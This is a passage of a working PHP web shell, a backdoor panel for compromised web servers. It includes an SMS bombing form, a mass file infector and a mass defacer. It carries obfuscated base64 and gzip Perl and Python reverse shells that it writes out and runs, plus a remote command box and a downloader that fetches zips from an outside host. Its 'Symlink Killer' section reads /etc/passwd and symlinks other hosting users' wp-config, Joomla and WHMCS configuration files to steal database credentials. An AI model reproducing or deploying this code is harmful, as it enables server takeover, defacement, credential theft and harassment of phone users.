729<option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
730<option value='@blsdcs.net'>Bell South Mobility</option>
731<option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
732<option value='@blueskyfrog.com'>Blue Sky Frog</option>
733<option value='@sms.bluecell.com'>Bluegrass Cellular</option>
734<option value='@myboostmobile.com'>Boost</option>
735<option value='@bplmobile.com'>BPL Mobile</option>
736<option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
737<option value='@cmcpaging.com'>Carolina Mobile</option>
738<option value='@cwwsms.com'>Carolina West Wireless</option>
739<option value='@cell1.textmsg.com'>Cellular One</option>
740<option value='@cellularone.textmsg.com'>Cellular One2</option>
741<option value='@message.cellone-sf.com'>Cellular One3</option>
742<option value='@mobile.celloneusa.com'>Cellular One4</option>
743<option value='@sbcemail.com'>Cellular One5</option>
744<option value='@phone.cellone.net'>Cellular One (East Coast)</option>
745<option value='@swmsg.com'>Cellular One (South West)</option>
746<option value='@mycellone.com'>Cellular One (West)</option>
747<option value='@paging.cellone-sf.com'>Cellular One PCS</option>
748<option value='@csouth1.com'>Cellular South</option>
749<option value='@cwemail.com'>Centennial Wireless</option>
750<option value='@cvcpaging.com'>Central Vermont</option>
751<option value='@messaging.centurytel.net'>CenturyTel</option>
752<option value='@rpgmail.net'>Chennai RPG Cellular</option>
753<option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
754<option value='@gocbw.com'>Cincinnati Bell</option>
755<option value='@cingularme.com'>Cingular</option>
756<option value='@mms.cingularme.com'>Cingular2</option>
757<option value='@mycingular.com'>Cingular3</option>
758<option value='@page.cingular.com'>Cingular5</option>
759<option value='@txt.att.net'>Cingular (Now AT&T)</option>
760<option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
761<option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
762<option value='@msg.clearnet.com'>Clearnet</option>
763<option value='@comcastpcs.textmsg.com'>Comcast</option>
764<option value='@comcel.com.co'>Comcel</option>
765<option value='@sms.comviq.se'>Comviq</option>
766<option value='@cookmail.com'>Cook Paging</option>
767<option value='@corrwireless.net'>Corr Wireless Communications</option>
768<option value='@sms.mycricket.com'>Cricket</option>
769<option value='@sms.ctimovil.com.ar'>CTI</option>
770<option value='@airtelmail.com'>Delhi Aritel</option>
771<option value='@delhi.hutch.co.in'>Delhi Hutch</option>
772<option value='@page.hit.net'>Digi-Page / Page Kansas</option>
773<option value='@mobile.dobson.net'>Dobson</option>
774<option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
775<option value='@sms.edgewireless.com'>Edge Wireless</option>
776<option value='@sms.emt.ee'>EMT</option>
777<option value='@emtelworld.net'>Emtel (Mauritius)</option>
778<option value='@escotelmobile.com'>Escotel</option>
779<option value='@fido.ca'>Fido</option>
780<option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
781<option value='@sendabeep.net'>Galaxy Corporation</option>
782<option value='@webpager.us'>GCS Paging</option>
783<option value='@msg.gci.net'>General Communications Inc.</option>
784<option value='@t-mobile-sms.de'>German T-Mobile</option>
785<option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
786<option value='@bplmobile.com'>Goa BPLMobil</option>
787<option value='@sms.goldentele.com'>Golden Telecom</option>
788<option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
789<option value='@celforce.com'>Gujarat Celforce</option>
790<option value='@messaging.sprintpcs.com'>Helio</option>
791<option value='@text.houstoncellular.net'>Houston Cellular</option>
792<option value='@ideacellular.net'>Idea Cellular</option>
793<option value='@ivctext.com'>Illinois Valley Cellular</option>
794<option value='@page.infopagesystems.com'>Infopage Systems</option>
795<option value='@inlandlink.com'>Inland Cellular Telephone</option>
796<option value='@msg.iridium.com'>Iridium (satellite)</option>
797<option value='@rek2.com.mx'>Iusacell</option>
798<option value='@jsmtel.com'>JSM Tele-Page</option>
799<option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
800<option value='@mci.com'>MCI Phone</option>
801<option value='@sms.mymeteor.ie'>Meteor</option>
802<option value='@metropcs.sms.us'>Metro PCS</option>
803<option value='@clearlydigital.com'>Midwest Wireless</option>
804<option value='@mobilecomm.net'>Mobilcomm</option>
805<option value='@text.mtsmobility.com'>MTS</option>
806<option value='@sms.netcom.no'>Netcom</option>
807<option value='@messaging.nextel.com'>Nextel</option>
808<option value='@o2.co.uk'>O2</option>
809<option value='@o2imail.co.uk'>O2#2</option>
810<option value='@mmail.co.uk'>O2 (M-mail)</option>
811<option value='@orange.net'>Orange</option>
812<option value='@qwestmp.com'>Qwest</option>
813<option value='@pcs.rogers.com'>Rogers</option>
814<option value='@sms.sasktel.com'>Sasktel (Canada)</option>
815<option value='@mysmart.mymobile.ph'>Smart Telecom</option>
816<option value='@messaging.sprintpcs.com'>Sprint</option>
817<option value='@tms.suncom.com'>Sumcom</option>
818<option value='@tmomail.net'>T-Mobile</option>
819<option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
820<option value='@t-d1-sms.de'>T-Mobile Germany</option>
821<option value='@txt.att.net'>Tracfone</option>
822<option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
823<option value='@vtext.com'>Verizon</option>
824<option value='@vmobl.com'>Virgin Mobile</option>
825<option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
826<option value='@vodafone.net'>Vodafone UK</option>
827</select>
828</td>
829</tr>
830<tr>
831<td>Amount Of Messages To Send:</td>
832<td><input type='text' name='numberof' size='10' class='text'></td>
833</tr>
834<tr>
835<td>From:</td>
836<td><input type='text' name='from' class='text'></td>
837</tr>
838<tr>
839<td>Subject:</td>
840<td><input type='text' size='85' class='text' name='subject'></td>
841</tr>
842</table>
843Message Content:<br>
844<textarea rows='20' cols='150' name='message_content' style='color:#00ff00'>
845</textarea><br>
846<input type='submit' name='do_bomb_sms' value='Bomb'><br>
847</form><br></font><br>";
848}
849?>
850<?php
851//Install MySQL Tool
852if (isset($_GET['installMySQL'])) {
853 echo "<center>
854<font size='4'>
855<a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
856<br>
857<br>
858<a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
859</font>
860</center>
861<br>";
862}
863//MSD 1 stuff
864if (isset($_GET['msd1'])) {
865 echo "<center>
866<font color='#14ab00' size='3'>
867Directory to install to:<br>
868If directory does not exist it will attempt to create it.
869<form action='' method='post'>
870<input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
871<input type='submit' name='installmsd1' value='Install'>
872<form>
873</font>
874</center>
875<br>";
876}
877if (isset($_POST['installmsd1'])) {
878 $msd1dir = rtrim($_POST['msd1dir'], "/");
879 $msd1dir2 = "$msd1dir/msdv2.zip";
880 if (!is_dir($msd1dir)) {
881 if (!mkdir($msd1dir, 0777)) {
882 error("Failed to make directory $msd1dir");
883 }
884 }
885 $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
886 if (file_put_contents($msd1dir2, $link)) {
887 unzip($msd1dir2, $msd1dir);
888 } else {
889 error("Could not write to $msd1dir");
890 }
891}
892//MSD 2 stuff
893if (isset($_GET['msd2'])) {
894 echo "<center>
895<font color='#14ab00' size='3'>
896Directory to install to:<br>
897If directory does not exist it will attempt to create it.
898<form action='' method='post'>
899<input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
900<input type='submit' name='installmsd2' value='Install'>
901<form>
902</font>
903</center>
904<br>";
905}
906if (isset($_POST['installmsd2'])) {
907 $msd2dir = rtrim($_POST['msd2dir'], "/");
908 $msd2dir2 = "$msd2dir/msd.zip";
909 if (!is_dir($msd2dir)) {
910 if (!mkdir($msd2dir, 0777)) {
911 error("Failed to make directory $msd2dir");
912 }
913 }
914 $link = file_get_contents("http://p0wersurge.com/msd.zip");
915 if (file_put_contents($msd2dir2, $link)) {
916 unzip($msd2dir2, $msd2dir);
917 } else {
918 error("Could not write to $msd2dir");
919 }
920}
921?>
922<?php
923//Mass file infect
924if (isset($_POST['do_mass_infect'])) {
925 $masscode = " " . $_POST['massinfect_code'] . "\n";
926 $inf_dir = $_POST['infect_dir'];
927 $infcustom_dir = $_POST['cinfect_dir'];
928 $infcustom_dir = rtrim($infcustom_dir, "/");
929 $failed = 0;
930 $success = 0;
931 if (empty($masscode)) {
932 error("You must enter a code to infect files with!");
933 } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
934 error("You must enter a custom directory when using the Custom option!");
935 } else {
936 if ($inf_dir == "root") {
937 $mddir = $rootdir;
938 }
939 if ($inf_dir == "custom") {
940 $mddir = $infcustom_dir;
941 }
942 foreach (files($mddir) as $key => $file) {
943 $file2 = trim($file, ".");
944 $getinf_file = file_get_contents($file2);
945 if ("$file2" == "$dir/$script2") {
946 echo "";
947 } else {
948 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
949 echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
950 $success++;
951 } else {
952 echo "<font color='red'><b>Failed to infect file : $file2</b></font><br>";
953 $failed++;
954 }
955 }
956 }
957 echo "<font color='#14ab00'><b>$success files successfully infected! ^_^<br>Failed to infect $failed files! :( </b></font><br>";
958 }
959}
960if (isset($_GET['massinfect'])) {
961 $example = "<?php system() ?>";
962 $example = htmlspecialchars($example);
963 $example2 = "<script>alert()</script>";
964 $example2 = htmlspecialchars($example2);
965 echo "<center>
966<font color='#14ab00'>
967<form action='' method='post'>
968Directory to start infect from:<br>
969<select name='infect_dir'>
970<option value='root'>Root</option>
971<option value='custom'>Custom</option>
972</select><br>
973Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
974This is great for infecting mass files with javascript scripts or php scripts<br>
975It will append the code to the top of each file.<br>
976Example:<br>
977$example<br>
978$example2<br>
979Infect code:<br>
980<textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
981</textarea><br>
982This will not infect this shell.<br>
983<input type='submit' name='do_mass_infect' value='Infect'><br>
984</form>
985</font>
986</center>";
987}
988?>
989<?php
990//Mass fucker
991//secret hack was here :*
992if (isset($_POST['do_mass_deface'])) {
993 if (get_magic_quotes_gpc()) {
994 $mass_source = stripslashes($_POST['massdeface_source']);
995 } else {
996 $mass_source = $_POST['massdeface_source'];
997 }
998 $def_dir = $_POST['deface_dir'];
999 $custom_dir = $_POST['custom_dir'];
1000 $custom_dir = rtrim($custom_dir, "/");
1001 $failed = 0;
1002 $success = 0;
1003 if (empty($mass_source)) {
1004 error("You must enter a source!");
1005 } elseif (empty($custom_dir) && $def_dir == "custom") {
1006 error("You must enter a custom directory when using the Custom option!");
1007 } else {
1008 if ($def_dir == "root") {
1009 $mddir = $rootdir;
1010 }
1011 if ($def_dir == "custom") {
1012 $mddir = $custom_dir;
1013 }
1014 foreach (files($mddir) as $key => $file) {
1015 $file2 = trim($file, ".");
1016 if ("$file2" == "$dir/$script2") {
1017 echo "";
1018 } else {
1019 if (file_put_contents("$file2", $mass_source)) {
1020 echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
1021 $success++;
1022 } else {
1023 echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
1024 $failed++;
1025 }
1026 }
1027 }
1028 echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
1029 }
1030}
1031if (isset($_GET['massdeface'])) {
1032 echo "<center>
1033<font color='#14ab00'>
1034<form action='' method='post'>
1035Directory to start deface from:<br>
1036<select name='deface_dir'>
1037<option value='root'>Root</option>
1038<option value='custom'>Custom</option>
1039</select><br>
1040Custom Directory: <input class='text' type='text' name='custom_dir' size=security'40'><br>
1041Source of deface:<br>
1042<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1043</textarea><br>
1044This will not deface this shell.<br>
1045<input type='submit' name='do_mass_deface' value='Deface'><br>
1046</form>
1047</font>
1048</center>";
1049}
1050?>
1051<?php
1052if(isset($_GET['perlbackconnect']))
1053{ ?>
1054
1055<?php
1056
1057
1058if(isset($_POST['sbm']))
1059{
1060 $r=$_POST["ip"];
1061 $s=$_POST["port"];
1062 $p1 ='hVNhb5swEP0eKf/hSqsFpNCE9sOkRFTLUtKibU0FJJrEUGTgWlCJHWGzJZr234dNqBKlVY0E9rtnv3e+4/xsUPFyEOd0sMGy6Ha6nYojuPPRyGfJC4qxhC74jgtcgw09RY0Jz3pNZOLdTe0v9Xup1psypwI0ME3bDsOvJHmZMkoxEeBnWBRRZNumCb/onhCzLbA/FFOIdxAgWYNL05wfUWsyaOrw/Al0JXhmXxnwV0KwF1xw8owjuBhCeM+4iCB8ZGX9kdubzZDmCJqzVSTr6vPlsH4ssK6ta2g5/9r8D3KXy1le4D2haYEK4iqq+/PpNyfow+Ns5T7IiQRWfuA5kx99eEaxKZlg8Y6SNeo9kWx6hgGsVEb2tkMzggUlcYEgGHjIWfEbQWbQWkqa63sVk9okTctVTtVdLEMr6kNOUayIYC02jIwPtNqyHGo1VZazRs28IZVgT0XFM91QDLZBqvvBrfvQB+3mU0PTjmPzRdB/L+Z43kms9Sfr/Nb4qJUOvetaRTnWWbl+MHO/O2No1v5k6UgMxphkrAbrkoBJYPw6VQF10t5W28nv+ak7d37Suf5J5761N61SvFSjQMEhwy2ILOfAs1zAz1s4POAou/1/2Bg8d+azbuc/';
1063
1064 $dec= gzinflate(base64_decode($p1));
1065 $fname = fopen('backconn.pl','w');
1066 fwrite($fname,$dec);
1067 $d="backconn.pl";
1068 $ch="chmod +x ".$d ;
1069 $permission= system($ch);
1070
1071 $z="perl ".$d." ".$r." ".$s;
1072 $run= system($z);
1073
1074 }
1075
1076}
1077?>
1078
1079<?php
1080if(isset($_POST['pyb']))
1081{
1082 $r=$_POST["pyt"];
1083 $s=$_POST["port"];
1084 $py = 'fVLfS8MwEH4X/B9u9WEptJ1O8UEouI0JIjpwe+vK6I/bGpYmJUnV+tebrF2dIEsgucv33eXj7q4Go1rJUUr5qGp0IfjlRbtpWQmpQTXKAyWyPWoPhLXrtJIiQ6WOzEIoDaFlBoncfUQ3sX09RIdAuSY9Mo7dY1CbMlCoc9wmNdOalihqTe6ve45BIM2I+2AdAC2bzgKjaG+/7JIcLtJ5k6fN89t85XXucjF72SxX7/PJq3sSHWSCc8w0IVa+Z9W6f3CFPCfD4fD41q4cP5CJCiWILeiCKlCZpJUGY6V3TCffiXzclQll5oMS1vxv+Ony/TCMoqn4gsUnxxymDawwKeGZ53RZIGNxHIa+b3KsudHRixMqyOtqTKzILWXIBXG96/PwzXl4fB6+/S2M1WUL3w9BkCWMkcg5TJAqHM/xqRN3AfiVoalN14muw30PK2mGA5xoEMOsbQYVHCwrB8Nz/suBUgrpAf6XZG4x+CyMbOi6S/nOMeyWbE87Tj8=';
1085
1086 $dec= gzinflate(base64_decode($py));
1087 $fname = fopen('backconn.py','w');
1088 fwrite($fname,$dec);
1089 $d="backconn.py";
1090 $ch="chmod +x ".$d ;
1091 $permission= system($ch);
1092
1093 $z="python ".$d." ".$r." ".$s;
1094 $run= system($z);
1095
1096 }
1097?>
1098<?php
1099//echo out files
1100echo "<table border='1' width='100%' frame='void'>
1101<tr>
1102<th>
1103Current Directory: ";
1104$ex = explode("/", $dir);
1105for ($p = 0;$p < count($ex);$p++) {
1106 @$linkpath.= $ex[$p] . '/';
1107 $linkpath2 = rtrim($linkpath, "/");
1108 echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
1109}
1110echo "</th>
1111</tr>
1112</table>
1113<div id='hover'>
1114<table border='1' width='100%'>
1115<form action='' method='post' id='checkboxall'>
1116<tr>
1117<th>Directory/File Name</th>
1118<th>Owner/Group</th>
1119<th>Permissions</th>
1120<th>Writeable</th>
1121<th>Size</th>
1122<th>Last Modified</th>
1123<th>Delete</th>
1124<th>Rename</th>
1125<th>Mass</th>
1126</tr>
1127";
1128foreach ($direcs as $d) {
1129 $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
1130 $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
1131 if (is_array($downer)) {
1132 $downer = $downer['name'];
1133 }
1134 if (is_array($dgroup)) {
1135 $dgroup = $dgroup['name'];
1136 }
1137 $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
1138 $dwrite = is_writeable("$dir/$d") ? "<font color='#00ff00'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1139 $dsize = "Directory";
1140 $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
1141 echo "<tr>
1142<td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
1143<td style='text-align: center;'>$downer/$dgroup</td>
1144<td style='text-align: center;'>$dperms</td>
1145<td style='text-align: center;'>$dwrite</td>
1146<td style='text-align: center;'>$dsize</td>
1147<td style='text-align: center;'>$dtime</td>
1148<td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
1149<td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
1150<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
1151</tr>";
1152}
1153foreach ($files as $f) {
1154 $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
1155 $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
1156 if (is_array($fowner)) {
1157 $fowner = $fowner['name'];
1158 }
1159 if (is_array($fgroup)) {
1160 $fgroup = $fgroup['name'];
1161 }
1162 $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
1163 $fwrite = is_writeable("$dir/$f") ? "<font color='#00ff00'><b>Writeable ^_^</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1164 $fsize = ByteConversion(filesize("$dir/$f"));
1165 $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
1166 $zip_file = explode(".", $f);
1167 $zip_file2 = end($zip_file);
1168 echo "<tr>";
1169 if ($zip_file2 == "zip") {
1170 echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
1171 } else {
1172 echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
1173 }
1174 echo "<td style='text-align: center;'>$fowner/$fgroup</td>
1175<td style='text-align: center;'>$fperms</td>
1176<td style='text-align: center;'>$fwrite</td>
1177<td style='text-align: center;'>$fsize</td>
1178<td style='text-align: center;'>$ftime</td>
1179<td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
1180<td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
1181<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
1182</tr>";
1183}
1184echo "</table></div>";
1185echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
1186<input type='button' onclick='checkall();' value='Select/Unselect All'>
1187<select name='mass_action'>
1188<option value='Delete'>Delete</option>
1189<option value='chmod'>chmod</option>
1190</select>
1191<input type='text' name='chmod_value' class='text' value='permission num' size='9' id='ch' onfocus='removeValue()'>
1192<input type='submit' name='mass_files'><br></div>";
1193echo "</form>";
1194closedir();
1195?>
1196<script type="text/javascript">/*<![CDATA[*/function removeValue(){document.getElementById("ch").value=""}checked=false;function checkall(a){var c=document.getElementById("checkboxall");if(checked==false){checked=true}else{checked=false}for(var b=0;b<c.elements.length;b++){c.elements[b].checked=checked}};/*]]>*/</script>
1197<?php
1198$wr = is_writeable($dir) ? "<font color='#00ff00'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
1199echo "<table border='1' width='100%' frame='void'>
1200<tr>
1201<td>
1202<center>
1203Create directory:<br>
1204<form action='' method='post'>
1205<input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
1206<input type='submit' name='do_create_dir' value='Create'><br>
1207$wr
1208</form>
1209</center>
1210</td>
1211<td>
1212<center>
1213Create file:<br>
1214<form action='' method='post'>
1215<input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
1216<input type='submit' name='do_create_file' value='Create'><br>
1217$wr
1218</form>
1219</center>
1220</td>
1221</tr>
1222<tr>
1223<td>
1224<center>
1225Go to directory:<br>
1226<form action='' method='post'>
1227<input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
1228<input type='submit' name='do_go_dir' value='Go'><br>
1229</form>
1230</center>
1231</td>
1232<td>
1233<center>
1234Edit file:<br>
1235<form action='' method='post'>
1236<input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
1237<input type='submit' name='do_go_edit' value='Edit'><br>
1238</form>
1239</center>
1240</td>
1241</tr>
1242<tr>
1243<td>
1244<center>
1245<form action='' method='post' enctype='multipart/form-data'>
1246Upload to location:<br>
1247<input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
1248<input type='submit' value='Upload' name='do_upload_file'><br>
1249$wr
1250</form>
1251</center>
1252</td>
1253<td>
1254<center>
1255<form action='' method='post'>
1256upload from link :<br>
1257<input type='text' name='wget_file' class='text' size='50' value='http://'>
1258<input type='submit' name='do_wget_file' value='wget'>
1259</form>
1260</center>
1261</td>
1262</tr>
1263<table border='1' frame='void' width='100%'>
1264<tr>
1265<td>
1266<center>
1267<form action='' method='post'>
1268Write Command here :<br>
1269<input type='text' class='text' name='exe_command' size='60'>
1270<input type='submit' name='do_exe_command' value='Execute'><br>
1271</form>
1272</center>
1273</td>
1274</tr>
1275</table>
1276<br><br><br>";
1277?>
1278<?php
1279//Salt generator
1280function gen_salt($length) {
1281 $characters = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
1282 $i = 0;
1283 $salt = "";
1284 while ($i < $length) {
1285 $arrand = array_rand($characters, 1);
1286 $salt.= $characters[$arrand];
1287 $i++;
1288 }
1289 return $salt;
1290}
1291?>
1292<h2><p>Symlink Killer ++</p></h2>
1293<form method=post><font color=white size=2 face="comic sans ms">Click this button to Create PHP.ini</font><p>
1294<input type=submit name=ini value="Generate PHP.ini" /></form>
1295<form method=post><font color=white size=2 face="comic sans ms">Click this button to find usernames to steal configurations</font><p>
1296<input type=submit name="usre" value="Find usernames" /></form>
1297<?php
1298 if(isset($_POST['ini']))
1299 {
1300
1301 $r=fopen('php.ini','w');
1302 $rr="safe_mode=OFF \n disable_functions=NONE \n php = on \n perl = on \n SecretHack(^_^) =OFF(>_<) \n \n Enjoy...";
1303 fwrite($r,$rr);
1304 $link="<a href=php.ini><font color=red size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
1305 echo $link;
1306
1307 }
1308
1309
1310
1311 ?>
1312<?php
1313 error_reporting(0);
1314 echo "<font color=red size=2 face=\"comic sans ms\">";
1315 if(isset($_POST['su']))
1316 {
1317 mkdir('secrethack',0777);
1318$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1319$g = fopen('secrethack/.htaccess','w');
1320fwrite($g,$rr);
1321$security = symlink("/","secrethack/root");
1322 $rt="<a href=secrethack/root><font color=white size=3 face=\"comic sans ms\"> Success </font></a>";
1323 echo "Check link given below for / configs folder <br><u>$rt</u>";
1324
1325 $dir=mkdir('SECRETHACK',0777);
1326 $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1327 $f = fopen('SECRETHACK/.htaccess','w');
1328
1329 fwrite($f,$r);
1330 $consym="<a href=SECRETHACK/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
1331 echo "<br>The link given below for config files ... open it , once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
1332
1333 $usr=explode("\n",$_POST['user']);
1334 $configuration=array("wp-config.php","wordpress/wp-config.php","web/wp-config.php","wp/wp-config.php","press/wp-config.php","wordpress/beta/wp-config.php","news/wp-config.php","new/wp-config.php","blogs/wp-config.php","home/wp-config.php","blog/wp-config.php","protal/wp-config.php","site/wp-config.php","main/wp-config.php","test/wp-config.php","wp/beta/wp-config.php","beta/wp-config.php","joomla/configuration.php","protal/configuration.php","joo/configuration.php","cms/configuration.php","site/configuration.php","main/configuration.php","news/configuration.php","new/configuration.php","home/configuration.php","configuration.php","SSI.php","forum/SSI.php","forum/inc/config.php","forum/includes/config.php","upload/includes/config.php","cc/includes/config.php","vb/includes/config.php","vb3/includes/config.php","cpanel/configuration.php","panel/configuration.php","ubmitticket.php","manage/configuration.php","myshop/configuration.php","beta/configuration.php","includes/config.php","lib/config.php","conf_global.php","inc/config.php","icl/config.php","include/db.php","include/config.php","includes/functions.php","includes/dist-configure.php","connect.php","mk_conf.php","config/koneksi.php","system/sistem.php","config.php","Settings.php","settings.php","sites/default/settings.php","smf/Settings.php","forum/Settings.php","forums/Settings.php","host/configuration.php","hosting/configuration.php","hosts/configuration.php","zencart/includes/dist-configure.php","shop/includes/dist-configure.php","whm/configuration.php","whmc/configuration.php","whmcs/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","order/configuration.php","support/configuration.php","supports/configuration.php","oscommerce/includes/configure.php","oscommerces/includes/configure.php","shopping/includes/configure.php","sale/includes/configure.php","config.inc.php","amember/config.inc.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configurtion.php","billing/configuration.php","billings/configuration.php","admin/conf.php","datas/config.php","e107_config.php","/default/settings.php","admin/config.php");
1335 foreach($usr as $uss )
1336 {
1337 $us=trim($uss);
1338
1339 foreach($configuration as $c)
1340 {
1341 $rs="/home/".$us."/public_html/".$c;
1342 $r="SECRETHACK/".$us." .. ".$c;
1343 symlink($rs,$r);
1344
1345 }
1346
1347 }
1348
1349
1350 }
1351
1352
1353
1354 ?>
1355<?php
1356 if(isset($_POST['usre'])){
1357 ?><form method=post>
1358<textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
1359foreach($users as $user)
1360{
1361$str=explode(":",$user);
1362echo $str[0]."\n";
1363}
1364
1365?>
1366 </textarea><br><br>
1367<input type=submit name=su value="Start Extract" /></form>
1368<?php } ?>
1369<form method=post>
1370<font color=white size=2 face="comic sans ms">Click this button to open manual symlink form</font><p>
1371<input type=submit name=man value="Open Manual symlink form"/></form>
1372<?php
1373 if(isset($_POST['man']))
1374{
1375?>
1376<form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">  file name with which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned) for file which will represent symlink<br><br><input type=submit name=manual value="Lets do it "></form>
1377<?php
1378}
1379 ?>
1380<?php
1381 error_reporting(0);
1382 if(isset($_POST['manual']))
1383 {
1384 $dlink=trim($_POST['dli']);
1385 $fna=trim($_POST['fna']);
1386 mkdir('SECRETHACK',0777);
1387 $acc = " Options all \n DirectoryIndex security.html \n Require None \n Satisfy Any";
1388$ha = fopen('SECRETHACK/.htaccess','w');
1389fwrite($ha,$acc);
1390$final="SECRETHACK/".$fna;
1391symlink($dlink,$final);
1392
1393echo "<br>File link for Symlink ".$dlink." link >>> <a href=".$final."><font color=red size=3>is here</font></a>";
1394}
1395 ?>
1396<form method=post>
1397<font color=white size=2 face="comic sans ms">Click this button To Get Configs </font><p>
1398<input type=submit name=passx value="Secret Hack"><p></form>
1399<?php
1400if(isset($_POST['passx']))
1401{
1402 ?>
1403<textarea style="background:black;color:white" rows=20 cols=50 name=usernames><?php $users=file("/etc/passwd");
1404foreach($users as $user)
1405{
1406$str=explode("\n",$user);
1407echo $str[0]."\n";
1408}
1409
1410?></textarea>
1411<?php
1412}
1413
1414
1415
1416?>
1417<form method=post>
1418<font size=5 color=white> <input type=submit name=perl value="Configuration File Killer"> </font></form>
1419<p>
1420<?php
1421if(isset($_POST['perl']))
1422{
1423 error_reporting(0);
1424
